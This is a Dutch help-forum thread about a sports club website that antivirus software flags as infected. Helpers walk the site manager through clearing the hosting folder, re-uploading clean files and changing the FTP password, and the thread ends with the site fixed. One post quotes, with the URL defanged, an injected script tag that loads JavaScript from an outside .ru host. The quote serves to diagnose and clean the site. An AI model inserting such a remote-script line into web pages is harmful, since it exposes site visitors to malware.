virus op website ...

Status
Niet open voor verdere reacties.

balletvos

Gebruiker
Lid geworden
12 aug 2007
Berichten
9
Helaas is er een virus op de website van onze gymnastiekvereniging terecht gekomen en kun je er nu niet meer goed opkomen:

- de website opent wel, maar enkel de eerste pagina (index), en er komt dan via AVG een waarschuwing dat er een virus aanwezig is.
- je kunt dan wel op de linker knoppen klikken en de tekst opent zich dan in een apart scherm.
- ik heb de website zelf niet gemaakt en heb hem enkel overgenomen om te beheren.
- de maker is helaas onbereikbaar.
- via domein.nl heb ik al vragen gesteld (er vanuit gegaan dat zij de website geblokkeerd hebben) en zij antwoordden:

Beste M M. Korporaal-De Vos,

Helaas kunnen wij alleen de blokkade eraf halen als de domeinnaammap leeg is gehaald. Daarna kunt u uw schone website weer
uploaden.

Vriendelijke groeten,

Het Mijndomein support team


NU HEB IK DE VOLGENDE VRAGEN:


- om mijn domeinnaammap leeg te halen; moet ik dan gewoon alle bestanden verwijderen in public/sites/www.domeinnaam.nl ???

- moet ik daarna weer contact met domein.nl opnemen ???

- halen die dan vervolgens de blokkade eraf ???
(als er uberhaubt een blokkade opzit; want via Google kun je de website nog wel gewoon opvragen!!!
Dus misschien blokkeert AVG de website gewoon?)

- kan ik dan alle bestanden weer uploaden via een extern FTP-programma ???

- komen de verschillende bestanden (pagina's van de website) automatisch op de goede plaats terecht ???

- moet ik daarna mijn wachtwoord nog wijzigen bij domein.nl ???

- en daarna ook een heroverweging bij Google aanvragen ???
(als Google de malware of het virus uberhaupt wel heeft geconstateerd en er melding van heeft gedaan, zodat mijn domein is geblokkeerd)


WIE KAN MIJ HELPEN!!!???

Mieke.
 
Het zou helpen als je ons vertelde om welke domeinnaam het gaat, anders kunnen we natuurlijk niet zien of de site inderdaad extern geblokkeerd is of alleen door AVG (ik neem aan dat je dat zelf geïnstalleerd hebt)
wat je vragen betreft.

- om mijn domeinnaammap leeg te halen; moet ik dan gewoon alle bestanden verwijderen in public/sites/www.domeinnaam.nl ???
Ja. Dat kun je of doen met een FTP programma (filezilla bijvoorbeeld) of via de software van de host. Waarschijnlijk is dat Directadmin of Plesk)
- moet ik daarna weer contact met domein.nl opnemen ???
Als er een blokkade van hun kant is wel ja.
- halen die dan vervolgens de blokkade eraf ???
Dat zou je wel mogen verwachten.
- kan ik dan alle bestanden weer uploaden via een extern FTP-programma ???
Ja, aangenomen dat je zeker weet dat de bestanden die je upload wel schoon zijn, anders heeft het natuurlijk weinig zin.

- komen de verschillende bestanden (pagina's van de website) automatisch op de goede plaats terecht ???
Als de bestanden lokaal op een logische manier zijn opgeslagen wel ja.

- moet ik daarna mijn wachtwoord nog wijzigen bij domein.nl ???
Zeker! Kennelijk is het wachtwoord van jullie FTP server op de één of andere manier uitgelekt (goede kans dat iemand met het wachtwoord op z'n PC een virus had/heeft dat het gelekt heeft.*) Als je je wachtwoord niet verandert heb je zo weer een virus te pakken. Zorg er dan wel voor dat het nieuwe wachtwoord niet te raden (niet de naam van de vereniging dus) en niet te simpel is. Iets met kleine- en hoofdletters en als het even kan cijfers.

- en daarna ook een heroverweging bij Google aanvragen ???
Als zij denken dat jullie site besmet is wel ja.

*vergeet dus niet om je eigen PC ook op virussen te controleren en vraag de anderen die het wachtwoord op de PC zouden kunnen hebben staan hetelfde te doen.
 
Laatst bewerkt:
Die website geeft geen enkel probleem hiero. Het kan wel zo zijn, dat er mischien gebruikt wordt van bepaalde scriptjes die AVG als een 'virus' o.i.d. ziet .. Dat wil dus zeggen, dat het dan ook niet zo is of wel is, or what ever ...

Dus .. Website werkt gewoon (zoals het waarschijnlijk ook de bedoeling was/is dat hij werkt) :)

Suc6! :thumb:
 
Wat is dat raar, zeg!!!
Als ik de website wil bekijken, krijg ik enkel de indexpagina te zien en openen de verschillende pagina's (dmv de knoppen links) apart in een scherm.
En als ik mijn computer daarna scan op virussen, dan zit er in:
C/documents & settings/ beheerder/ local settings/temp.internetfiles/content IE5/..........(diverse verschillende cijfers en letters, telkens anders)/kroospikkers_nl (1)htm
het volgende virus:
JS/Redir

Normaal opende de website overigens gelijk met de indexpagina (achtergrond met kikker en links de knoppen) en daarin de tekst van de beginpagina.

Mieke.
 
Hallo!

Het gaat om www.kroospikkers.nl
(hoe weet je dan of het extern of door AVG of een andere virusscanner geblokkeerd wordt???)
Simpel, als er bij jou wel alarmbellen gaan rinkelen en bij mij niet dan zit de detectie dus ergens op jouw PC, wat dus ook het geval is.

Die website geeft geen enkel probleem hiero. Het kan wel zo zijn, dat er mischien gebruikt wordt van bepaalde scriptjes die AVG als een 'virus' o.i.d. ziet .. Dat wil dus zeggen, dat het dan ook niet zo is of wel is, or what ever ...

Dus .. Website werkt gewoon (zoals het waarschijnlijk ook de bedoeling was/is dat hij werkt) :)
Dat zeg je nou wel, maar onderaan in de broncode van de voorpagina vinden we
HTML:
<script type="text/javascript" src="http : / / pantscow.ru:8080/Cc.js"></script>
(heb de url even onklaar gemaakt) Nu lijkt die link niet te werken, maar ik zou dat stuk code toch maar even verwijderen, en de overige paginas controleren of het daar ook op staat. Of die code nu daadwerkelijk kwaadaardig is of niet, hij hoort daar niet thuis.
 
Domme vraag misschien:
Maar hoe kom ik in de broncode van de voorpagina???
Weet het allemaal even niet meer, hoor... mijn hoofd loopt over!

Mieke.
 
Domme vraag misschien:
Maar hoe kom ik in de broncode van de voorpagina???
Weet het allemaal even niet meer, hoor... mijn hoofd loopt over!

Mieke.
Gewoon het html bestand openen met, bijvoorbeeld, notepad. Als je een ftp programma gebruikt dan kan dat waarschijnlijk wel automatisch het html bestand in notepad openen en weer op de server opslaan nadat je er mee klaar bent. Via directadmin kan het ook, Plesk zal het denk ik ook wel kunnen maar daar heb ik geen ervaring mee.
 
hier grijpt nod smart securety gelijk in,en site is niet te zien.
html /scrinject B. gen virus?
 
Laatst bewerkt:
Heb dat stukje script code wel eens eerder gezien .. En dat houdt eigenlijk maar 1 ding in .. Weg wezen bij die webhoster .. Website/Host is gehacked, waarbij ze die code o.a. gebruiken ..
 
Bedankt!!!

Hierbij wil ik nog even melden dat ik de hele map leeg heb gehaald, alles weer schoon heb geupload, mijn wachtwoord voor de zekerheid nog heb gewijzigd, en alles nu weer in orde is!

IEDEREEN REUZE BEDANKT VOOR ZIJN/HAAR HULP!!!
 
Status
Niet open voor verdere reacties.

Nieuwste berichten

Terug
Bovenaan Onderaan